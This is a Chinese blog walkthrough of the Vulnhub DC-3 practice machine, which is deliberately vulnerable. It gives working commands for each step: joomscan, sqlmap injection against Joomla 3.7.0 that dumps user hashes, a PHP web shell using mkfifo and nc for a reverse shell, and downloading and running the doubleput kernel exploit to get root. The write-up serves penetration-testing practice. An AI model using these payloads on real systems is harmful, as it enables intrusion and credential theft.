Vulnhub靶机 DC-3

最新推荐文章于 2024-06-29 21:30:35 发布
最新推荐文章于 2024-06-29 21:30:35 发布
阅读量397 收藏
点赞数 1
分类专栏: vulnhub 文章标签: 信息安全 安全 经验分享 恰饭
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38005854/article/details/104993342
版权

扫描ip

在这里插入图片描述
找到靶机192.168.0.131
发现开放80端口
必须访问一下啊

在这里插入图片描述
这个样子的,没啥信息

在这里插入图片描述
上插件 wappalyzer 火狐的指纹信息插件

在这里插入图片描述
nmap也扫了一下

实锤了,Joomla的cms
那肯定要用配套的joomscan扫一下啊
没事就扫一扫,扫扫更健康

在这里插入图片描述

没安装,先装一下

apt-get install joomscan 安装命令

在这里插入图片描述
看见版本号了,3.7.0,还有后台地址
后台地址都出来了
肯定先登陆一下啊

joomscan -u 192.168.0.131

在这里插入图片描述
我也不知道我再想什么
啥啥账号都没有
就去登录后台
拿or 1=1去登录啊?
还是去找一下
看看这个版本有没有漏洞吧

在这里插入图片描述
还真有,就一个!!!
我就喜欢这种的
要有漏洞,就给我报一个出来
省的爆出一大堆
还得挨个试
麻烦

searchsploit joomla 3.7.0

在这里插入图片描述
看一眼这漏洞说明吧
也没啥事干
就当练练英语阅读了

在这里插入图片描述
解释很清晰啊
就直接看着利用就行了
直接出库名了

sqlmap -u "http://192.168.0.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

在这里插入图片描述
表名get!
接下来看我文章的小伙伴
要是跟着手打操作的
一定要注意
那个表名不是 _
用到表名的时候
一定要去爆出的数据里复制表名
坑人啊
我以为是 _
一直报错,气死我了

sqlmap -u "http://192.168.0.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb --tables

在这里插入图片描述
字段名get!
column不应该加s么
我没加s
不知道为啥没报错
不管了

sqlmap -u "http://192.168.0.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T #_users --column

在这里插入图片描述
数据get!
hash值直接破解
snoopy
(因为我又忘截图了,太累了,我实在是懒得再去弄一遍了,kali好多自带的hash破解软件,可以搜一下)

sqlmap -u "http://192.168.0.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D 'joomladb' -T '#__users' -C 'username,name,password' --dump

在这里插入图片描述
刚才的后台地址用上了!
直接登录!!!!
还好页面我没关

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

有文件上传的地方,直接来个写个文件进去
然后去访问一下文件

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip地址 端口号 >/tmp/f');?>

在这里插入图片描述
在这里插入图片描述

先用nc去监听端口
然后访问网站
shell
get!!!
(本机ip被我搞错了,害得我又因为不能nc,卡住了,一耗就是一下午,要疯了)

在这里插入图片描述

然后看一眼操作系统的版本(又没截图,我随便找了一个,嘿嘿)
4.4.0
查了一下
是ubuntu 16.04
接下来怎么说!
迷茫了
百度一下

uname -a

在这里插入图片描述
找漏洞,又是找漏洞
你看看这么一大堆
密密麻麻的
我就头皮发麻
不挨个试了
看别人说39772好使
直接用

searchsploit ubuntu 16.04

在这里插入图片描述
在这里插入图片描述下载错地方了
应该在nc那个窗口里输入下载命令
下载之后,找到39772.zip
解压

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
unzip 39772.zip

在这里插入图片描述在这里插入图片描述
继续解压

tar -xvf exploit.tar

在这里插入图片描述
在这里插入图片描述
应该出来了四个文件
然后输入:

./compile.sh
./doubleput    没有.c 没有.c 没有.c  重要的事情说三遍
whoami
id

在这里插入图片描述

看一下
是root
老铁没毛病!在这里插入图片描述看一下flag!
over!
开心!

菜浪马废
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub】---DC-3靶机
qq_43168364的博客
08-22 545
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机DC-3 靶机(192.168.15.151) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:namp -sn 102.168.15.0/24 或者用netdiscover, 命令: netdiscover -i eth0 -r 192.168.15.0/24 或者用, arp-scan -l 端口扫描 命令: masscan --ra
Vulnhub DC-3靶场
weixin_47019868的博客
11-14 1003
Vulnhub DC-3靶场
39772.zip靶机所用文件66
08-11
dc3靶机所用文件
vulunhub靶机--DC-2测试思路
最新发布
hxh108的博客
06-29 465
bin/sh即可提取到root权限,之后进入root文件中,就可看到最终的flag文件。根据flag1的提示,使用cewl生成有关靶机的弱口令字典,之后使用wpscan扫描靶机wordpress的用户名。命令:wpscan --url http://dc-2/ -U 4.txt -P 192.168.206.135dict.txt。成功后,回退一个目录,进入Jerry中即可发现flag4.txt,或者直接su切换到Jerry查看。命令:wpscan --url http://dc-2/ -e u。
vulnhubDC3靶机
LainWith的博客
08-11 2143
靶机概览信息收集nmap信息收集网站信息收集查找漏洞漏洞描述渗透攻击SQL注入攻击获取当前数据库的名字获取当前数据库的表名获取指定数据库的字段名获取目标字段密码破解getshell寻找上传点 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-3,312/ 靶机界面: 信息收集 由于我这里采用了NAT,所以很容易确定目标机器,如果你的网络环境里有众多机器,并且系统版本与靶机相似,且不方便更换连接虚拟机的方式,你可以.
vulnhub通关-3 DC-3(含靶场资源)
Brucye
02-07 939
6.网络设置,要与攻击机kali在同一网段,要么都用NAT模式,要么都用桥接模式(我这里用是是NAT模式)链接:https://pan.baidu.com/s/1tJr7V5ZbYMtfCLeOa40r2Q。建议不要使用https源,https更换源需要处理安全问题较为麻烦,我这里直接使用的http源。注意:doublepu.c执行后会生成doublepu 要再次执行doublepu。这款工具是专门对Joomla框架进行扫描的,需要进行下载。3.接下来选择你想导入的路径,进行导入即可。
vulnhub--DC3靶机渗透
Gh0st_1n_The_Shell的博客
08-08 134
文章目录信息收集尝试攻击获取shell方法1获取shell方法2获取shell方法3拿到root权限拿FLAG总结 信息收集 kali的ip为192.168.200.4,扫描出一个IP为192.168.200.5的Linux,怀疑是靶机 发现只开了80端口,估计纯靠web漏洞了 欢迎来到 DC-3。 这一次,只有一面旗帜,一个入口,没有任何线索。 要获得标志,您显然必须获得 root 权限。 如何成为 root 取决于您——当然,也取决于系统。 祝你好运 - 我希望你喜欢这个小挑战。 :-) 首先先.
Vulnhub靶机实战——DC-3
冠霖L的博客
09-27 9038
靶机DC-3下载地址:https://download.vulnhub.com/dc/DC-3.zip 靶机DC-3VMware下载地址:https://download.vulnhub.com/dc/DC-3VMware.zip 注:开始将DC-3.ova文件导入VMware虚拟机,发现无法获取到靶机IP地址,作者在DC-3靶机下载页面提到可以下载已经搭建好的DC-3VMware,然...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
vulnhub靶场之DC-3
qq_58091216的博客
01-08 1241
如果您的网站正在运行 Joomla,您可以对您的网站使用 JoomScan 实用程序来发现漏洞或仅提供有助于攻击您网站的一般信息。漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。与以前的 DC 版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有任何线索。Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。我们可以看到用户名爆破出来了,密码是加密的,我们进行解密。
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
热门推荐
Aluxian_的博客
03-23 1万+
Vulnhub靶机DC3渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:漏洞发现:③:SQL注入:④:文件上传:⑤:提权: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC-3开始,只有一个最终的flag,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载:
Vulnhub-DC-3靶机实战
御七彩虹猫
03-31 1048
Vulnhub-DC-3靶机实战
Vulnhub靶机:DC-3渗透详细过程
菜鸟学渗透
04-11 848
Vulnhub靶机:DC-3渗透详细过程
vulnhub DC系列 DC-3
m0_64815693的博客
12-29 1839
vulnhub DC系列 DC-3
[Vulnhub] DC-3靶机渗透
weixin_45605352的博客
08-05 306
0x00 环境搭建 靶机地址:http://www.vulnhub.com/entry/dc-32,312/ 下载之后用vmware打开即可,使用桥接模式。 开机后搭建完成: 该靶场只有一个flag。 0x01 主机端口探测 用arp-scan -l 探测内网存活主机,再用nmap -sV -p- ip来探测端口: 发现只开启了80端口(HTTP服务) 0x02 web渗透 访问80端口,发现是一个 Joomla 搭建的站: 目录扫描,真正有用的目录不多: 从 README.txt 中获得 Jo
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值